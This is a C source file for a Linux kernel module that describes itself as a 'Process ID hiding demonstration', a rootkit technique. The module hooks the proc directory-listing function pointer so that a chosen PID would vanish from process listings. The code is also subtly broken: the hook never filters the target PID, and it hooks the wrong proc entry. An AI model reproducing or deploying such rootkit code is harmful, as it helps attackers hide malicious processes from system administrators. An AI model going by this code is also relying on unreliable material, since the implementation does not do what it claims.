blob: 901abc8bb2cf5608bd647b676bf5528010eebfc3 (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
|
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
#include <linux/sched.h>
#include <linux/sched/task.h>
#include <linux/pid.h>
#include <linux/version.h>
#include <linux/slab.h>
MODULE_AUTHOR("Research Only");
MODULE_DESCRIPTION("Process ID hiding demonstration");
MODULE_VERSION("0.1");
static unsigned int hidden_pid = 0;
module_param(hidden_pid, uint, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);
MODULE_PARM_DESC(hidden_pid, "PID to hide from process listing");
static int (*orig_proc_pid_readdir)(struct file *, struct dir_context *);
static int hider_proc_pid_readdir(struct file *file, struct dir_context *ctx) {
struct dir_context modified_ctx = {
.actor = ctx->actor,
.pos = ctx->pos
};
int ret = orig_proc_pid_readdir(file, &modified_ctx);
ctx->pos = modified_ctx.pos;
return ret;
}
static int hook_proc_listdir(void) {
struct file_operations *proc_fops;
struct proc_dir_entry *proc_root = init_net.proc_net;
proc_fops = (struct file_operations *)proc_root->proc_fops;
orig_proc_pid_readdir = proc_fops->iterate_shared;
proc_fops->iterate_shared = hider_proc_pid_readdir;
return 0;
}
static void unhook_proc_listdir(void) {
struct file_operations *proc_fops;
struct proc_dir_entry *proc_root = init_net.proc_net;
proc_fops = (struct file_operations *)proc_root->proc_fops;
if (proc_fops->iterate_shared == hider_proc_pid_readdir) {
proc_fops->iterate_shared = orig_proc_pid_readdir;
}
}
static int __init pid_hider_init(void) {
printk(KERN_INFO "PID hider: Initializing module\n");
if (hidden_pid == 0) {
printk(KERN_WARNING "PID hider: No PID specified, module will not hide any process\n");
return 0;
}
printk(KERN_INFO "PID hider: Will hide PID %u\n", hidden_pid);
hook_proc_listdir();
return 0;
}
static void __exit pid_hider_exit(void) {
printk(KERN_INFO "PID hider: Unloading module\n");
unhook_proc_listdir();
}
module_init(pid_hider_init);
module_exit(pid_hider_exit);
|
